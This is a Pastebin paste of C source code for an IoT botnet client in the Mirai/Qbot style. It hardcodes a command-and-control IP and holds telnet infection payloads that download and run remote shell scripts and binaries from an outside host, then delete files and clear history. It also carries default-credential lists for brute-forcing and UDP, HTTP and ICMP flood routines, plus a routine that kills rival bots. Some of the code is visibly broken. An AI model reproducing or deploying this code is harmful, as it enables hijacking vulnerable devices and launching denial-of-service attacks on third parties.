miraip0ts

Bone-super-private-clientside

Apr 30th, 2017
1,225
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 11.47 KB | None | 0 0
  1. #include <stdlib.h>
  2. #include <stdarg.h>
  3. #include <stdio.h>
  4. #include <sys/socket.h>
  5. #include <sys/types.h>
  6. #include <netinet/in.h>
  7. #include <arpa/inet.h>
  8. #include <netdb.h>
  9. #include <signal.h>
  10. #include <strings.h>
  11. #include <string.h>
  12. #include <sys/utsname.h>
  13. #include <unistd.h>
  14. #include <fcntl.h>
  15. #include <errno.h>
  16. #include <netinet/ip.h>
  17. #include <netinet/udp.h>
  18. #include <netinet/tcp.h>
  19. #include <sys/wait.h>
  20. #include <sys/ioctl.h>
  21. #include <net/if.h>
  22. #include <time.h>
  23. #include <limits.h>
  24.  
  25.  
  26. unsigned char *D3cOdeMePlS[] = { "188.209.52.74" };
  27.  
  28. int Server_Botport = 123;
  29.  
  30. //Payload For Telnet Scanner
  31. const char *TelnetPayload = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.166.185.157/kittyhaxz.sh; chmod 777 kittyhaxz.sh; sh kittyhaxz.sh; ktftp 46.166.185.157 -c get ktftp1.sh; chmod 777 ktftp1.sh; sh ktftp1.sh; ktftp -r ktftp2.sh -g 46.166.185.157; chmod 777 ktftp2.sh; sh ktftp2.sh; rm -rf kittyhaxz.sh ktftp1.sh ktftp2.sh; rm -rf *;history -c\r\n";
  32.  
  33. const char *TelnetPayload2 = "cd /tmp || cd /var/run || cd /var/tmp;rm -rf Kekz*; busybox wget http://46.166.185.157/kittyhaxz.sh; chmod 777 kittyhaxz.sh;busybox sh kittyhaxz.sh;busybox ktftp 46.166.185.157 -c get ktftp1.sh; chmod 777 ktftp1.sh; busybox sh ktftp1.sh;busybox ktftp -r ktftp2.sh -g 46.166.185.157; chmod 777 ktftp2.sh; busybox sh ktftp2.sh; rm -rf kittyhaxz.sh ktftp1.sh ktftp2.sh; rm -rf Kekz*\r\n";
  34. //Payload for Phone scanner
  35.  
  36. const char *phonepayload = "cd /tmp; wget http://46.166.185.157/kittyphones -O phone; chmod 777 phone; ./phone;wget http://46.166.185.157/pl0xmipsel -O pl0xmipsel; chmod 777 pl0xmipsel; ./pl0xmipsel; rm -rf phone pl0xmipsel\r\n";
  37.  
  38. //Telnet Usernames
  39. char *usernames[] = { "telnet\0", "root\0", "root\0", "root\0"};
  40. char *passwords[] = { "telnet\0", "root\0", "\0", "123456\0"};
  41.  
  42. char* phone[] = {":", "ogin", "sername", "assword", "Linux", "9615-cdp", (char*)0};
  43. char* advances[] = {":", "ogin", "sername", "assword", (char*)0};
  44. char* fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
  45. char* advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "$", "#", "BusyBox", (char*)0};
  46.  
  47. const char *useragents[] = {
  48. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  49. "Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)",
  50. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  51. "Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
  52. "Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0",
  53. "Opera/6.04 (Windows XP; U) [en]",
  54. "Opera/9.99 (X11; U; sk)",
  55. "Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5",
  56. "Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc",
  57. "Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk",
  58. "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
  59. "Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)",
  60. "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15",
  61. "AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)",
  62. "AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)"
  63. "AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)",
  64. "AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)",
  65. "AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)",
  66. "AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)",
  67. "AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)",
  68. "AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)",
  69. "AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)",
  70. "AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)",
  71. "AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)",
  72. "AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)",
  73. "magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)",
  74. "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)",
  75. "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)",
  76. "MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)",
  77. "MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)",
  78. "Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
  79. };
  80.  
  81.  
  82.        
  83.        //implemented by Kekz
  84.        //modified by Kekz
  85.         void sendUKNOWN(unsigned char *ip, int secs) {
  86.         int packetsize = rand() % 65500, flag=1,fd,iUNK_SOCK;
  87.         int RandPorts[] = {80, 53, 8080, 443, 3074, 22, 23, 21, 20, 69, 587, 8080, 5000, 8000, 5222, 5223, 3724, 3127, 990, 28960, 14567};  
  88.         int RP = rand() % (sizeof(RandPorts)/sizeof(char *));
  89.         iUNK_SOCK = socket(AF_INET, SOCK_DGRAM, 0);
  90.         time_t start = time(NULL);
  91.         struct sockaddr_in sin;
  92.         struct hostent *hp;
  93.         hp = gethostbyname(ip);
  94.         bzero((char*) &sin,sizeof(sin));
  95.         bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  96.         sin.sin_family = hp->h_addrtype;
  97.         sin.sin_port = RP;
  98.         unsigned int i = 0;
  99.         while(1) {
  100.         char *RandString[] = {"nwonknu", "unknown", "hello", "slammed", "Linux", "Machines", "Dank", "Layer4", "hhfdhkhbhcace", "flood", "ugiydg", "IOHEDU9S", "SIAHDIYSGBILC", "DSFDD", "DVAS", "EFFAESF",
  101.        "uhdusaibxi", "OIEDNBOUBAS", "WQIJOIWENASO", "pkpinasoubc", "wubihbdc", "inopxuob", "wubiddsd", "savduhvaU", "UHyig732vgux", "UByovoouds", "saybuyyyywugav", "sdjbciysvhdaocu",
  102.        "dsibciwveas", "dsygc8y32723", "tydjtr", "tfkyt", "rsyreg", "HCKG", "uibeiubf", "YRXDJR", "YIFUKT", "YCJYRX", "7TUFF", "dsgdf", "idsh", "sgd", "gffag", "gfdag", "fgadf", "fbafdb", "fbbbf", "dfbdfb", "fdbxb"};
  103.        char *UKN_STRING = RandString[rand() % (sizeof(RandString) / sizeof(char *))];
  104.                 flag=1;
  105.                 ioctl(fd,FIONBIO,&flag);
  106.         if (i >= 50) {
  107.                 send(iUNK_SOCK, UKN_STRING, packetsize, 0);
  108.                 connect(iUNK_SOCK,(struct sockaddr *) &sin, sizeof(sin));
  109.         if (time(NULL) >= start + secs) {
  110.         close(iUNK_SOCK);
  111.        _exit(0);
  112.       }
  113.      i = 0;
  114.     }
  115.    i++;
  116.   }
  117. }
  118.     void sendSTD(unsigned char *ip, int port, int secs) {
  119.    int iSTD_Sock;
  120.    iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
  121.    time_t start = time(NULL);
  122.    struct sockaddr_in sin;
  123.    struct hostent *hp;
  124.    hp = gethostbyname(ip);
  125.    bzero((char*) &sin,sizeof(sin));
  126.    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  127.    sin.sin_family = hp->h_addrtype;
  128.    sin.sin_port = port;
  129.    unsigned int a = 0;
  130. while(1)
  131. {
  132.      char *randstrings[] = {"BEDROLL", "BEDSORE", "BEETLED", "BEETLES", "BEHESTS", "BEHOLDS", "BENDERS", "DELETES", "DEBTORS", "DUSTERS", "ENSURED", "EYELESS", "EYELETS", "HOLSTER", "HUNTERS", "LENDERS", "HOTBEDS", "LUSHEST", "Car", "Cat",
  133.      "sudo", "yum", "apt", "get", "http", "request", "dts", "std", "socket", "create", "Hax", "Merry", "holidays", "vdeubhs", "G8WGVSI", "VUSAVXU", "28H9UgBGvv", "IYVkhj", "YVU", "uiVU",  
  134.      "Linux", "Machines", "su", "super", "user", "26736", "18h3b2", "Kekz", "wrecked", "Unix", "Strings", "Manipulation", "Command", "Line", "Of", "Kekz", "edew", "apt-get", "ewdb", "ubed",
  135.      "iyvugvjvkh", "HBiug655", "KJYDFyljf754", "hbjhvihk", "guygiuov", "ugyi", "iyfutvugjiu", "hbivutfyrfvg", "uivyuivug", "khvihvgiug", "jbihvbig", "ubihkbvihyvigv",
  136.      "bivhkb", "vejvbboqi", "vobqre", "odupubw", "ftyduiy", "hbilyfutdi", "78tgyuhkbjg", "tudiryxcvi", "iygcduy", "RTRTWFNJ", "ghdugffytsdyt", "tgerthgwtrwry", "yteytietyue", "qsortEQS", "8969876hjkghblk",
  137.      "mOO", "uVN", "3rt", "24K", "Yy3", "sxP", "zHJ", "Ztl", "fEL", "J1G", "6mD4Q", "Ck0Zt", "6T1bg", "joNuc", "v9SNj", "Fm74C", "pXVcb", "w472Y", "vn6PH", "Ycy7z",
  138.      "EraqpCtc", "eQE9VqOO", "0I2tFegb", "c9vSbX37", "HzullcDD", "sQT6GUpo", "SE5iiTRL", "8YnpVkqQ", "P4ZFrN8y", "ZaygGQWy", "4b9hcI2E0ob", "NbOwbHGP1sv", "Hot98t9cA1C",
  139.      "SmosSnBu3UI", "6LhO2mqIaG2", "wFKTDkBE12q", "wr5RiFwx0oe", "bKJDMfvjRK2", "CXaCtbYiETK", "HRvlWcOcb8v", "SozDWxWE2jAWgGv", "LO53SCJbVwKjAta", "M6qlcepTThrOhl3",
  140.      "s4VIALs5l0Murlt", "eHj9MDyMU2PoJ32", "aLQP6OWncMD8Pq7", "1zoihgOpu92HLUz", "wZU4i9GsFjT3DXt", "8SqliubwCJDq9fg", "NBLlKNISq52KJNr", "uewbdih", "wqodbpdwdqw", "iqhdpuqhwb"};
  141.      char *STD2_STRING = randstrings[rand() % (sizeof(randstrings) / sizeof(char *))];
  142.     if (a >= 50)
  143.     {
  144.     send(iSTD_Sock, STD2_STRING, 75, 0);
  145.     connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
  146.     if (time(NULL) >= start + secs) {
  147.     close(iSTD_Sock);
  148.    _exit(0);
  149.    }
  150.    a = 0;
  151.   }
  152.   a++;
  153.  }
  154. }
  155. int socket_connect(char *host, in_port_t port) {
  156. struct hostent *hp;
  157. struct sockaddr_in addr;
  158. int on = 1, sock;    
  159. if ((hp = gethostbyname(host)) == NULL) return 0;
  160. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  161. addr.sin_port = htons(port);
  162. addr.sin_family = AF_INET;
  163. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  164. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
  165. if (sock == -1) return 0;
  166. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
  167. return sock;
  168. }
  169. void sendHTTP(void *host, char *method, in_port_t port, char *path, int timeFoo, int power) {
  170. const char *connections[] = {"close", "keep-alive", "accept"};
  171. int i, timeEnd = time(NULL) + timeFoo;
  172. char request[512], buffer[1];
  173. sprintf(request, "%s %s HTTP/1.1\r\nConnection: %s\r\nAccept: */*\r\nUser-Agent: %s\r\n", method, path, connections[(rand() % 3)], useragents[(rand() % 31)]);
  174. for (i = 0; i < power; i++) {
  175. if (fork()) {
  176. while (timeEnd > time(NULL)) {
  177. int socket = socket_connect((char *)host, port);
  178. if (socket != 0) {
  179. write(socket, request, strlen(request));
  180. read(socket, buffer, 1);
  181. close(socket);
  182. write(socket, request, strlen(request));
  183. close(socket);
  184. }
  185. }
  186. _exit(1);
  187. }
  188. }
  189. }
  190. //ICMPFlood By Kekz
  191. void ICMPFlood(unsigned char *ipzz, int PacketSize, int Intervalz, int TimeNeg) {
  192.     int socket;
  193.     char ICMPNigz[512], buffer[1];
  194.     sprintf(ICMPNigz, "ping %s -s %s -i %s -w %s\r\n", ipzz, PacketSize, Intervalz, TimeNeg);
  195.     system(ICMPNigz);
  196.     write(socket, ICMPNigz, strlen(ICMPNigz));
  197.     read(socket, buffer, 1);
  198.     close(socket);
  199.     write(socket, ICMPNigz, strlen(ICMPNigz));
  200.     close(socket);
  201. }
  202. void botkiller() {
  203.   char TestingKiller[80];
  204.   char *RandBots[] = {"busybox", "armv6", "armv4", "mips", "mipsel", "cock",  "fucknet", "swatnet", "botnet", "dicknet", "fucknet", "cracknet",  "weednet", "ballnet",  "queernet", "unet", "net",  "yougay", "gaynet", "armv5l", "armv6l", "ktftp", "hax", "buff", "i686", "mips64", "jackmeoff", "sex", "sexy", "briankrebs", "bin", "sparc", "powerpc-440fp", "sh4", "cunt", "shit" };
  205.   char *Boatnetz = RandBots[rand() % (sizeof(RandBots) / sizeof(char *))];
  206.   sprintf(TestingKiller, "kill -9 $(pidof %s)\r\n", Boatnetz);
  207.   system(TestingKiller);    
  208.   system("kill -9 $(pidof busybox\r\n");
  209.   system("history -c\r\n");
  210.   char Killer2[80];
  211.   char Hackerzz = rand() % 5500;
  212.   sprintf(Killer2, "kill -9 %s\r\n", Hackerzz);
  213.   system(Killer2);
  214. }
  215.  
  216. //note: not finished will do later
  217. /*
  218. void netgear() {
  219. int ipzz;
  220. ipzz = NetGearRanges();
  221. struct sockaddr_in dest_addr;
  222. dest_addr.sin_family = AF_INET;
  223. dest_addr.sin_port = htons(8080);
  224. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  225. dest_addr.sin_addr.s_addr = ipzz;
  226. }
  227. */
Advertisement
Add Comment
Please, Sign In to add comment